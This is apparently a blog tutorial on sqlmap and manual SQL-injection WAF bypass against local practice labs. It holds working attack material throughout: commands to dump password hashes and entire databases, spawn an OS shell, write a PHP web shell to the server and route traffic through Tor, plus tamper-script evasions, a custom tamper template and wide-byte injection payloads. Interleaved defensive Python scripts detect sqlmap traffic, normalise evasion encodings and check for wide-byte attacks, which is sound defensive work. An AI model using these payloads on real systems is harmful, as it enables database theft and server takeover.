--users: enumerate DBMS users
--passwords: enumerate DBMS user password hashes
--privileges: enumerate DBMS user privileges
--roles: enumerate DBMS user roles
--dbs: enumerate DBMS databases
--tables: enumerate DBMS database tables
--columns: enumerate DBMS database table columns
--schema: enumerate the DBMS schema
--count: retrieve the number of entries in tables
--dump: dump DBMS database table entries
--dump-all: dump all DBMS database table entries
--search: search for column(s), table(s) and/or database name(s)
--comments: retrieve DBMS comments
-D DB: database to enumerate
-T TBL: table(s) to enumerate
-C COL: column(s) to enumerate
-X EXCLUDECOL: column(s) not to enumerate
-U USER: DBMS user to enumerate
--exclude-sysdbs: exclude system databases when enumerating tables
--where=DUMPWHERE: use a WHERE condition while dumping a table
--start=LIMITSTART: first query output entry to retrieve
--stop=LIMITSTOP: last query output entry to retrieve
--first=FIRSTCHAR: first query output word character to retrieve
--last=LASTCHAR: last query output word character to retrieve
--sql-query=QUERY: SQL statement to execute
--sql-file=SQLFILE: execute SQL statements from the given file(s)

Usage scenarios

sqlmap -u  "http://192.168.10.1/sqli/Less-1/?id=1"  #test whether the URL is injectable
sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1" --passwords #show the database users' password hashes
sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1" --current-user  #show the current database user
sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1" --is-dba  #check whether the current user has administrator (DBA) privileges
sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1" --roles   #list all database administrator roles
sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1" --dbs
sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1" --current-db #show the current database
sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1" -D security --tables #list all tables in database security
sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1" -D security -T users --columns
sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1" -D security -T users -C username --dump  #dump every value of column username in table users of database security
sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1" -D security -T users --dump-all #dump all data in table users of database security
sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1" -D security --dump-all   #dump all data in database security
sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1" --dump-all  #dump all data on the database server
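Seen from the server side, the runs above are easy to spot. As an added example (not from the original post), the script below parses a few constructed Apache combined-format log lines and flags the two most reliable signs of an automated scan: sqlmap's default User-Agent (which starts with `sqlmap/`; it disappears when the scan uses `--random-agent` or `--user-agent`, so it is only the first check) and a run of requests from one client whose decoded query string carries the boolean, time-based or UNION fragments that sqlmap's checks leave behind. The IP addresses, timestamps and version string in the sample are made up.

```python
# Added example (not from the original post): detecting sqlmap runs like the
# ones above in web-server access logs. The log lines are constructed for the
# demo (combined log format, documentation-range IPs).
import re
from collections import defaultdict
from urllib.parse import unquote_plus

SAMPLE_LOG = """\
198.51.100.7 - - [26/Jun/2022:17:01:02 +0800] "GET /sqli/Less-1/?id=1 HTTP/1.1" 200 912 "-" "sqlmap/1.6.6#stable (https://sqlmap.org)"
198.51.100.7 - - [26/Jun/2022:17:01:02 +0800] "GET /sqli/Less-1/?id=1%20AND%201%3D1 HTTP/1.1" 200 912 "-" "sqlmap/1.6.6#stable (https://sqlmap.org)"
198.51.100.7 - - [26/Jun/2022:17:01:03 +0800] "GET /sqli/Less-1/?id=1%20AND%201%3D2 HTTP/1.1" 200 640 "-" "sqlmap/1.6.6#stable (https://sqlmap.org)"
198.51.100.7 - - [26/Jun/2022:17:01:03 +0800] "GET /sqli/Less-1/?id=1%27%20AND%20SLEEP%285%29--%20 HTTP/1.1" 200 640 "-" "sqlmap/1.6.6#stable (https://sqlmap.org)"
203.0.113.9 - - [26/Jun/2022:17:01:04 +0800] "GET /sqli/Less-1/?id=1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL-- HTTP/1.1" 200 988 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
192.0.2.5 - - [26/Jun/2022:17:01:05 +0800] "GET /sqli/Less-1/?id=2 HTTP/1.1" 200 915 "-" "Mozilla/5.0 (X11; Linux x86_64)"
"""

# Apache/nginx "combined" format: ip ident user [time] "req" status size "ref" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$')

# Fragments that sqlmap's boolean-, time- and union-based checks leave in the
# query string (compare a -v 3 run, or the xml/payloads directory).
SQLI_RE = re.compile(
    r"(\bAND\b|\bOR\b)\s+\d+\s*=\s*\d+|\bSLEEP\s*\(|\bBENCHMARK\s*\(|\bUNION\s+(ALL\s+)?SELECT\b",
    re.IGNORECASE)


def parse_log(text):
    """Yield one dict per well-formed line; malformed lines are skipped."""
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m:
            yield m.groupdict()


def analyse(text=SAMPLE_LOG):
    """Per-IP counts of sqlmap User-Agent hits and injection-looking requests,
    plus the decoded paths that matched."""
    report = defaultdict(lambda: {"sqlmap_ua": 0, "sqli_payloads": 0, "samples": []})
    for rec in parse_log(text):
        entry = report[rec["ip"]]
        if rec["ua"].lower().startswith("sqlmap/"):
            entry["sqlmap_ua"] += 1
        decoded = unquote_plus(rec["path"])  # undo the URL encoding before matching
        if SQLI_RE.search(decoded):
            entry["sqli_payloads"] += 1
            entry["samples"].append(decoded)
    return dict(report)


def suspicious_ips(text=SAMPLE_LOG, threshold=2):
    """IPs that either announce sqlmap in the User-Agent or send at least
    `threshold` injection-looking requests; the second rule still fires when
    the scan hides behind --random-agent."""
    return sorted(ip for ip, e in analyse(text).items()
                  if e["sqlmap_ua"] or e["sqli_payloads"] >= threshold)


if __name__ == "__main__":
    for ip, entry in analyse().items():
        print(ip, entry["sqlmap_ua"], entry["sqli_payloads"])
    print("suspicious:", suspicious_ips())
```

With the sample log only 198.51.100.7 is flagged; the single UNION request from 203.0.113.9 stays under the threshold, which is the trade-off to tune per site (one hand-typed `UNION SELECT` from a developer should not page anyone, a burst of them should). A real deployment would add a per-minute window and feed the matched samples to the WAF rule review.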

Advanced usage

Detecting whether the target URL sits behind a WAF, and getting past it

--identify-waf   detect whether a WAF is present

#parameters used for bypassing
--random-agent    use a random HTTP User-Agent header; helps mostly when the WAF is badly configured
--time-sec=3      use a longer delay to avoid tripping the WAF; this approach is slow
--hpp             use HTTP parameter pollution, especially on ASP.NET/IIS platforms
--proxy=100.100.100.100:8080 --proxy-cred=211:985      route the traffic through a proxy
--ignore-proxy    do not use the system proxy, connect directly
--flush-session   flush the session files and redo the detection from scratch
--hex or --no-cast     change the character encoding used for retrieval
--mobile          target the site's mobile-device server
--tor             anonymous injection through Tor

Some sites filter out various characters; tamper scripts can deal with that (and also work against some WAFs)

sqlmap  --tamper=space2comment.py  #replace spaces with /**/
sqlmap  --tamper="space2comment.py,space2plus.py"  #apply several scripts at once

Detection level and risk level (--level, --risk)

sqlmap has 5 detection levels, default 1. The higher the level, the more payloads are used during detection; level 5 uses the most and will automatically test header injection points such as Cookie and XFF. Of course, the higher the level, the slower the detection. The level decides which injection points are tested: GET and POST data are always tested, the HTTP Cookie is tested from level 2, and the HTTP User-Agent/Referer headers from level 3. When you are not sure which parameter is the injection point, set the level to 5 for accuracy.

sqlmap has 3 risk levels, i.e. how risky you believe the tests against this site may be. Same idea as the detection level; when unsure, set it to 3: --risk=3

The payloads sqlmap uses live in the directory /usr/share/sqlmap/xml/payloads

sqlmap -u "http://192.168.10.1/sqli/Less-4/?id=1" --level=5 --risk=3 #detection level 5, risk level 3, both the maximum

Spoofing the HTTP Referer header

sqlmap can spoof the HTTP Referer in its requests. At detection level 3 or above it also tries to inject into the Referer, and the --referer option sets the value; for example, to make the Referer look like Baidu:

--referer="http://www.baidu.com"

Executing a given SQL statement (--sql-shell)

sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1" --sql-shell  #run SQL statements of your choosing

Executing operating-system commands (--os-shell)

sqlmap -u "http://192.168.10.1/sqli/Less-4/?id=1" --os-shell  #spawn an --os-shell

For a MySQL back end, three conditions must be met:

the current database user is root
the absolute path of the web root is known
the database's secure_file_priv variable is empty (on many installations it is NULL, which is why --os-shell fails even when the current user is root and the web root path is known)

image-20220626162300688

image-20220626162316166

Getting a Metasploit (MSF) shell back

MSF is not installed on my Windows box here, so I could not try this.

image-20220626162848161

Uploading a file to the database server

python sqlmap.py -u "http://127.0.0.1/pikachu/vul/sqli/sqli_str.php?name=vicne*&submit=%E6%9F%A5%E8%AF%A2" --dbms=mysql  --technique U  -v 3   --file-write  C:\Users\flow\Desktop\py\123.php  --file-dest "D:\phpStudy\PHPTutorial\WWW\pikachu\shell2.php"

image-20220626163311213

Summary of tamper scripts

I. Supported by all databases
1. apostrophemask.py
Purpose: replace the apostrophe with its UTF-8 full-width counterpart

("1 AND '1'='1") becomes '1 AND %EF%BC%871%EF%BC%87=%EF%BC%871'

2. base64encode.py
Purpose: Base64-encode the whole payload

("1' AND SLEEP(5)#") becomes 'MScgQU5EIFNMRUVQKDUpIw=='

3. multiplespaces.py
Purpose: add multiple spaces around SQL keywords

('1 UNION SELECT foobar') becomes '1    UNION     SELECT   foobar'

4. space2plus.py
Purpose: replace spaces with +

('SELECT id FROM users') becomes 'SELECT+id+FROM+users'

5. nonrecursivereplacement.py
Purpose: double-write SQL keywords

('1 UNION SELECT 2--') becomes '1 UNIOUNIONN SELESELECTCT 2--'

6. space2randomblank.py
Purpose: replace the space character with a random blank character from a valid set of alternatives

('SELECT id FROM users') becomes 'SELECT%0Did%0DFROM%0Ausers'

7. unionalltounion.py
Purpose: replace UNION ALL SELECT with UNION SELECT

('-1 UNION ALL SELECT') becomes '-1 UNION SELECT'

8. securesphere.py
Purpose: append a specially crafted string

('1 AND 1=1') becomes "1 AND 1=1 and '0having'='0having'"

II. MSSQL
1. space2hash.py
Purpose: bypass filtering of the space character: replace the space (' ') with a dash comment ('--') followed by a random string and a new line ('\n')

'1 AND 9227=9227' becomes '1--nVNaVoPYeva%0AAND--ngNvzqu%0A9227=9227'

2. equaltolike.py
Purpose: replace the equals sign with LIKE

SELECT * FROM users WHERE id=1 becomes SELECT * FROM users WHERE id LIKE 1

3. space2mssqlblank.py (MSSQL)
Purpose: replace spaces with other blank characters

SELECT id FROM users becomes SELECT%08id%02FROM%0Fusers

4. space2mssqlhash.py
Purpose: replace spaces

('1 AND 9227=9227') becomes '1%23%0AAND%23%0A9227=9227'

5. between.py
Purpose: replace the greater-than sign (>) with BETWEEN

('1 AND A > B--') becomes '1 AND A NOT BETWEEN 0 AND B--'

6. percentage.py
Purpose: ASP accepts a % sign in front of every character

SELECT FIELD FROM TABLE becomes %S%E%L%E%C%T %F%I%E%L%D %F%R%O%M %T%A%B%L%E

7. sp_password.py
Purpose: append sp_password to the end of the payload so the DBMS log obfuscates it automatically

('1 AND 9227=9227-- ') becomes '1 AND 9227=9227-- sp_password'

8. charencode.py
Purpose: URL-encode

SELECT FIELD FROM%20TABLE becomes %53%45%4c%45%43%54%20%46%49%45%4c%44%20%46%52%4f%4d%20%54%41%42%4c%45

9. randomcase.py
Purpose: random upper/lower case

INSERT becomes InsERt

10. charunicodeencode.py
Purpose: Unicode-encode the string

SELECT FIELD%20FROM TABLE becomes %u0053%u0045%u004c%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004c%u0044%u0020%u0046%u0052%u004f%u004d%u0020%u0054%u0041%u0042%u004c%u0045

11. space2comment.py
Purpose: replace spaces with /**/

SELECT id FROM users becomes SELECT/**/id/**/FROM/**/users

III. MySQL
1. equaltolike.py
Purpose: replace the equals sign with LIKE

SELECT * FROM users WHERE id=1 becomes SELECT * FROM users WHERE id LIKE 1

2. greatest.py
Purpose: bypass filtering of '>' by replacing the greater-than sign with GREATEST

('1 AND A > B') becomes '1 AND GREATEST(A,B+1)=A'

3. apostrophenullencode.py
Purpose: bypass quote filtering by replacing the quote character with its null-byte-prefixed encoding

("1 AND '1'='1") becomes '1 AND %00%271%00%27=%00%271'

4. ifnull2ifisnull.py
Purpose: bypass filtering of IFNULL

('IFNULL(1, 2)') becomes 'IF(ISNULL(1),2,1)'

5. space2mssqlhash.py
Purpose: replace spaces

('1 AND 9227=9227') becomes '1%23%0AAND%23%0A9227=9227'

6. modsecurityversioned.py
Purpose: wrap the complete query in a versioned comment (also covers the spaces)

('1 AND 2>1--') becomes '1 /*!30874AND 2>1*/--'

7. space2mysqlblank.py
Purpose: replace spaces with other blank characters (MySQL)

SELECT id FROM users becomes SELECT%0Bid%0BFROM%A0users

8. between.py
Purpose: replace the greater-than sign (>) with BETWEEN

('1 AND A > B--') becomes '1 AND A NOT BETWEEN 0 AND B--'

9. modsecurityzeroversioned.py
Purpose: wrap the complete query in a zero-versioned comment

('1 AND 2>1--') becomes '1 /*!00000AND 2>1*/--'

10. space2mysqldash.py
Purpose: replace the space character (' ') with a dash comment ('--') followed by a new line ('\n')

('1 AND 9227=9227') becomes '1--%0AAND--%0A9227=9227'

11. bluecoat.py
Purpose: replace the space after a SQL keyword with a valid random blank character, then replace = with LIKE

('SELECT id FROM users where id = 1') becomes 'SELECT%09id FROM users where id LIKE 1'

12. percentage.py
Purpose: ASP accepts a % sign in front of every character

SELECT FIELD FROM TABLE becomes %S%E%L%E%C%T %F%I%E%L%D %F%R%O%M %T%A%B%L%E

13. charencode.py
Purpose: URL-encode

SELECT FIELD FROM%20TABLE becomes %53%45%4c%45%43%54%20%46%49%45%4c%44%20%46%52%4f%4d%20%54%41%42%4c%45

14. randomcase.py
Purpose: random upper/lower case

INSERT becomes InsERt

15. versionedkeywords.py
Purpose: bypass via comments (each keyword wrapped in a versioned comment)

('1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,100,114,117,58))#') becomes 1/*!UNION*//*!ALL*//*!SELECT*//*!NULL*/,/*!NULL*/, CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER()/*!AS*//*!CHAR*/),CHAR(32)),CHAR(58,100,114,117,58))#

16. space2comment.py
Purpose: replace spaces with /**/

SELECT id FROM users becomes SELECT/**/id/**/FROM/**/users

17. charunicodeencode.py
Purpose: Unicode-encode the string

SELECT FIELD%20FROM TABLE becomes %u0053%u0045%u004c%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004c%u0044%u0020%u0046%u0052%u004f%u004d%u0020%u0054%u0041%u0042%u004c%u0045

18. versionedmorekeywords.py
Purpose: bypass via comments (MySQL below 5.1)

1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,122,114,115,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,115,114,121,58))# becomes 1/*!UNION**!ALL**!SELECT**!NULL*/,/*!NULL*/,/*!CONCAT*/(/*!CHAR*/(58,122,114,115,58),/*!IFNULL*/(CAST(/*!CURRENT_USER*/()/*!AS**!CHAR*/),/*!CHAR*/(32)),/*!CHAR*/(58,115,114,121,58))#

19. halfversionedmorekeywords.py
Purpose: when the database is MySQL, bypass the firewall by prefixing every keyword with a versioned comment opener

("value' UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL, NULL# AND 'QDWa'='QDWa") becomes "value'/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)),/*!0NULL,/*!0NULL#/*!0AND 'QDWa'='QDWa"

IV. Oracle
1. greatest.py
Purpose: bypass filtering of '>' by replacing the greater-than sign with GREATEST

('1 AND A > B') becomes '1 AND GREATEST(A,B+1)=A'

2. apostrophenullencode.py
Purpose: bypass quote filtering by replacing the quote character with its null-byte-prefixed encoding

("1 AND '1'='1") becomes '1 AND %00%271%00%27=%00%271'

3. between.py
Purpose: replace the greater-than sign (>) with BETWEEN

('1 AND A > B--') becomes '1 AND A NOT BETWEEN 0 AND B--'

4. charencode.py
Purpose: URL-encode

SELECT FIELD FROM%20TABLE becomes %53%45%4c%45%43%54%20%46%49%45%4c%44%20%46%52%4f%4d%20%54%41%42%4c%45

5. randomcase.py
Purpose: random upper/lower case

INSERT becomes InsERt

6. charunicodeencode.py
Purpose: Unicode-encode the string

SELECT FIELD%20FROM TABLE becomes %u0053%u0045%u004c%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004c%u0044%u0020%u0046%u0052%u004f%u004d%u0020%u0054%u0041%u0042%u004c%u0045

7. space2comment.py
Purpose: replace spaces with /**/

SELECT id FROM users becomes SELECT/**/id/**/FROM/**/users

V. PostgreSQL
1. greatest.py
Purpose: bypass filtering of '>' by replacing the greater-than sign with GREATEST

('1 AND A > B') becomes '1 AND GREATEST(A,B+1)=A'

2. apostrophenullencode.py
Purpose: bypass quote filtering by replacing the quote character with its null-byte-prefixed encoding

("1 AND '1'='1") becomes '1 AND %00%271%00%27=%00%271'

3. between.py
Purpose: replace the greater-than sign (>) with BETWEEN

('1 AND A > B--') becomes '1 AND A NOT BETWEEN 0 AND B--'

4. percentage.py
Purpose: ASP accepts a % sign in front of every character

SELECT FIELD FROM TABLE becomes %S%E%L%E%C%T %F%I%E%L%D %F%R%O%M %T%A%B%L%E

5. charencode.py
Purpose: URL-encode

SELECT FIELD FROM%20TABLE becomes %53%45%4c%45%43%54%20%46%49%45%4c%44%20%46%52%4f%4d%20%54%41%42%4c%45

6. randomcase.py
Purpose: random upper/lower case

INSERT becomes InsERt

7. charunicodeencode.py
Purpose: Unicode-encode the string

SELECT FIELD%20FROM TABLE becomes %u0053%u0045%u004c%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004c%u0044%u0020%u0046%u0052%u004f%u004d%u0020%u0054%u0041%u0042%u004c%u0045

8. space2comment.py
Purpose: replace spaces with /**/

SELECT id FROM users becomes SELECT/**/id/**/FROM/**/users

VI. Microsoft Access
1. appendnullbyte.py
Purpose: append a URL-encoded null byte at the end of the payload

('1 AND 1=1') becomes '1 AND 1=1%00'

VII. Other databases
1. chardoubleencode.py
Purpose: double URL-encode (characters that are already encoded are left alone)

SELECT FIELD FROM%20TABLE becomes %2553%2545%254c%2545%2543%2554%2520%2546%2549%2545%254c%2544%2520%2546%2552%254f%254d%2520%2554%2541%2542%254c%2545

2. unmagicquotes.py
Purpose: wide-character bypass of GPC addslashes

1' AND 1=1 becomes 1%bf%27 AND 1=1--

3. randomcomments.py
Purpose: split SQL keywords with /**/

Writing your own tamper script

Where the tamper scripts live

image-20220626164347817

Every Python file in the tamper folder follows this layout

import re
from lib.core.enums import PRIORITY

__priority__ = PRIORITY.HIGHEST

# Description of this script (can be left empty)
def dependencies():
    pass


# Transform the payload (just an example: replace spaces with /**/ and union with UnIoN)
def tamper(payload, **kwargs):
    payload = payload.replace('union', 'UnIoN')
    payload = payload.replace(' ', '/**/')
    return payload

Work out the bypass by hand first, then write a tamper so sqlmap applies it to every request

Integration with Burp

Burp has a plugin: sqlmap4burp++.0.2

It lets you launch sqlmap with one click

image-20220626164923258

Bypassing a WAF by hand

Spaces

Two spaces instead of one, a Tab instead of a space, %a0 = space:

%20 %09 %0a %0b %0c %0d %a0 %00 /**/  /*!*/

The most basic approach: replace spaces with comments

/*  comment */

If spaces are filtered but parentheses are not, parentheses can take their place.
In MySQL parentheses enclose subqueries, so any expression that yields a value can be wrapped in parentheses, and no space is needed on either side of a parenthesis.
For example:

select(user())from dual where(1=1)and(2=2)

Quotes

Quotes are usually needed in the final WHERE clause; use a hexadecimal literal instead

select column_name  from information_schema.columns where table_name=0x7573657273

Commas

Blind injection needs substr(), mid() and limit, all of which take commas. For substr() and mid() the FROM ... FOR syntax avoids the comma:

select substr(database() from 1 for 1);
select mid(database() from 1 for 1);

Using join:
union select 1,2     #equivalent to
union select * from (select 1)a join (select 2)b

Using like:
select ascii(mid(user(),1,1))=80   #equivalent to
select user() like 'r%'

For limit, use offset instead:
select * from news limit 0,1
# equivalent to the statement below
select * from news limit 1 offset 0

Comparison operators (<, >)

Use greatest() and least() (the former returns the largest value, the latter the smallest)
Again in blind injection, the binary search needs comparison operators; when they cannot be used, greatest() provides the way around.
The most common blind-injection statement:

select * from users where id=1 and ascii(substr(database(),1,1))>64

If the comparison operators are filtered this statement is unusable, and greatest can stand in for them. greatest(n1,n2,n3,...) returns the largest of its arguments (n1,n2,n3,...).
The statement above can then be rewritten as:

select * from users where id=1 and greatest(ascii(substr(database(),1,1)),64)=64

Using between ... and:
between a and b: returns the values between a and b, not including b

or / and / xor / not

and=&&  or=||   xor=|   not=!

Comment characters

id=1' union select 1,2,3||'1

The trailing ||'1 closes the final single quote of the query; alternatively:

id=1' union select 1,2,'3

The = sign

Use like, rlike or regexp, or use < and >

union, select, where, etc.

comment characters

case variation

inline comments

double-writing

encoding (URL encoding, ASCII, hex, Unicode)

equivalent functions

hex(), bin() ==> ascii()
sleep() ==> benchmark()
concat_ws() ==> group_concat()
mid(), substr() ==> substring()
@@user ==> user()
@@datadir ==> datadir()
when substring() and substr() cannot be used:
substr((select 'password'),1,1) = 0x70
strcmp(left('password',1), 0x69) = 1
strcmp(left('password',1), 0x70) = 0
strcmp(left('password',1), 0x71) = -1
?id=1+and+ascii(lower(mid((select+pwd+from+users+limit+1,1),1,1)))=74
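Almost every trick in the tamper summary and in the manual-bypass section above is a transformation a filter can undo before it matches, and a WAF or log detector that matches on the raw bytes is exactly the one these tricks defeat. As an added example (not from the original post) serving both of those sections, the script below canonicalises a parameter value by repeatedly URL-decoding it (chardoubleencode), decoding %uXXXX sequences (charunicodeencode), unwrapping `/*!00000 ... */` versioned comments and dropping `/**/` and random comments, collapsing every whitespace variant from the Spaces section, lower-casing (randomcase), treating `+` as a space (space2plus) and folding doubled keywords (nonrecursivereplacement), and only then runs a few signatures over the result. The sample inputs and the signature set are constructed for the demo.

```python
# Added example (not from the original post): canonicalise a query-string value
# so the evasions catalogued above collapse back to plain SQL before matching.
# Sample inputs and signatures are constructed for the demo.
import re
from urllib.parse import unquote

# Whitespace variants from the "Spaces" section: \t \n \v \f \r, NUL, NBSP (%a0)
WS_RE = re.compile(r"[\s\x00\xa0]+")
UNICODE_RE = re.compile(r"%u([0-9a-fA-F]{4})")      # charunicodeencode
KEYWORDS = ("union", "select", "from", "where", "and", "or", "sleep", "benchmark")


def normalise(value, max_rounds=3):
    """Canonical lower-case form of one parameter value."""
    s = value
    for _ in range(max_rounds):                      # chardoubleencode needs two passes
        s2 = unquote(s.replace("+", " "))            # space2plus: '+' means space
        s2 = UNICODE_RE.sub(lambda m: chr(int(m.group(1), 16)), s2)
        if s2 == s:
            break
        s = s2
    s = re.sub(r"/\*!\d*", " ", s)                   # /*!30874AND ...: keep the wrapped text
    s = re.sub(r"/\*.*?\*/", " ", s, flags=re.S)     # space2comment, randomcomments
    s = s.replace("*/", " ")                         # closing half of a versioned comment
    s = WS_RE.sub(" ", s).strip().lower()            # space2*blank, randomcase
    for kw in KEYWORDS:                              # nonrecursivereplacement: UNIOUNIONN
        for i in range(1, len(kw)):
            s = s.replace(kw[:i] + kw + kw[i:], kw)
    return s


VAL = r"(?:\d+|'[^']*'?|\"[^\"]*\"?)"               # a number or a (possibly unterminated) string
SIGNATURES = (
    ("union-select", re.compile(r"\bunion\b(?: all)? select\b")),
    ("tautology", re.compile(rf"\b(?:or|and) {VAL}\s*(?:=|<>|<|>|like)\s*{VAL}")),
    ("time-based", re.compile(r"\b(?:sleep|benchmark)\s*\(")),
    ("trailing-comment", re.compile(r"(?:--|#)\s*$")),
)


def classify(value):
    """Names of the signatures that fire on the canonical form of `value`."""
    canon = normalise(value)
    return [name for name, rx in SIGNATURES if rx.search(canon)]


# Constructed inputs, one per evasion discussed above.
SAMPLES = [
    "1/**/UNION/**/SELECT/**/NULL,NULL--",       # space2comment
    "1%2520UnIoN%2520SeLeCt%2520NULL",           # chardoubleencode + randomcase
    "1 /*!30874AND 2>1*/--",                     # modsecurityversioned
    "1 UNIOUNIONN SELESELECTCT 2--",             # nonrecursivereplacement
    "1%0bAND%0b9227=9227",                       # space2mysqlblank
    "1%27%20AND%20SLEEP%285%29--%20",            # time-based probe
    "2",                                         # benign
    "Andrew's selection",                        # benign, contains 'and' and 'select'
]


def demo():
    """Map each sample to the signatures it triggers."""
    return {s: classify(s) for s in SAMPLES}


if __name__ == "__main__":
    for value, hits in demo().items():
        print(f"{value!r:42} -> {normalise(value)!r:34} {hits}")
```

The order of the steps matters: comments are removed only after all decoding rounds, because an encoded `%2F%2A` must first become `/*`, and the whitespace collapse comes last so that the `\n` produced by the dash-comment tampers is folded like any other blank. The two benign samples show why the signatures are anchored on word boundaries rather than on bare keyword substrings.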

Wide-byte injection

When ' is filtered, the usual countermeasure is to turn ' into \'.
When MySQL uses the GBK character set it treats two bytes as one Chinese character, which gives two lines of thought:
(1) Let %df swallow the \. Concretely, urlencode(\') = %5c%27; prepending %df to %5c%27 gives %df%5c%27. Under GBK MySQL treats the two bytes %df%5c as one Chinese character, leaving %27 as a standalone (') character:

id=-1%df%27union select 1,user(),3--+

(2) Neutralise the \ in \', e.g. by constructing %**%5c%5c%27: the later %5c is escaped by the %5c in front of it.
PHP functions that typically give rise to wide-byte injection:
1. replace(): filters ' and \, turning ' into \', \ into \\ and " into \". Use approach (1).
2. addslashes(): returns the string with a backslash (\) added before the predefined characters ', " and \. Use approach (1)
(to defend against this, set the mysql_query connection to binary mode)
3. mysql_real_escape_string(): escapes the following characters:

\x00     \n     \r     \     '     "     \x1a
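The byte-level mechanism behind approach (1), and the check that stops it, as an added example (not from the original post). The script models an addslashes-style escaper that works byte by byte with no knowledge of the connection charset, then decodes the result the way a MySQL connection set to GBK would: the lead byte 0xDF pairs with the 0x5C backslash to form one CJK character and the quote behind it is left unescaped. The mitigation shown is to validate the raw input as a well-formed sequence in the declared charset before escaping it, which is what a charset-aware escape function (or the binary-mode connection mentioned above) achieves. The inputs are constructed for the demo.

```python
# Added example (not from the original post): why a byte-wise escaper loses
# its backslash under a GBK connection, and the well-formedness check that
# rejects the probe. Inputs are constructed for the demo.

# addslashes-style escaping table: ' " \ and NUL get a leading backslash.
ESCAPED = {0x27: b"\\'", 0x22: b'\\"', 0x5C: b"\\\\", 0x00: b"\\0"}


def addslashes(raw: bytes) -> bytes:
    """Byte-wise escaping with no notion of multibyte characters (the
    behaviour of PHP addslashes, or of an escape routine called with the
    wrong connection charset)."""
    return b"".join(ESCAPED.get(b, bytes([b])) for b in raw)


def as_mysql_gbk_sees_it(escaped: bytes) -> str:
    """Decode the escaped bytes as GBK, as the server does when the
    connection charset is GBK. 0xDF 0x5C is a valid two-byte GBK character,
    so the backslash is consumed as the trail byte of a CJK character and
    the following quote stands alone."""
    return escaped.decode("gbk")


def backslash_survives(raw: bytes) -> bool:
    """True if the quote is still escaped once the server has decoded it."""
    return "\\'" in as_mysql_gbk_sees_it(addslashes(raw))


def is_well_formed(raw: bytes, charset: str = "gbk") -> bool:
    """The mitigation: validate the raw input in the declared charset before
    escaping. 0xDF followed by 0x27 is not a valid GBK pair (the trail byte
    must be 0x40 or above), so the probe is rejected instead of being
    reinterpreted after escaping."""
    try:
        raw.decode(charset)
    except UnicodeDecodeError:
        return False
    return True


if __name__ == "__main__":
    for sample in (b"abc'", b"\xdf'", b"\xd6\xd0\xce\xc4'"):   # ascii, probe, GBK "中文"
        print(sample, "well-formed:", is_well_formed(sample),
              "backslash survives:", backslash_survives(sample))
```

For plain ASCII the escaped quote survives decoding; for the `%df%27` probe it does not, and the same probe fails the well-formedness check, which is the point at which the request should be rejected. Genuine GBK text such as 中文 passes the check and keeps its escaped quote.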

Splitting the request across several parameters

and a=[input1] and b=[input2]
a=union/*&b=*/select 1,2,3,4
and a=union /*and b=*/select 1,2,3,4

HTTP parameter pollution

Obscure functions

Use obscure functions in place of the common ones, e.g. in error-based injection use polygon() instead of the usual updatexml()

select polygon((select * from (select * from (select @@version) f) x));

Finding the site's origin IP

Injecting through the Cookie

Some programmers read parameters with $_REQUEST, which takes values from GET, POST and Cookie in turn. If the WAF only inspects GET/POST and not the Cookie, the injection can be placed in the Cookie to get past it.

Bypassing a WAF with sqlmap tamper scripts

I have no WAF at hand, so I am just noting an approach for later study.

Use the manual tests above to work out which tokens the WAF filters.

Then write a tamper that replaces all of the filtered tokens in one place and returns the result, and let sqlmap call it.

Posted 2022-06-26 17:19 by 木捏牛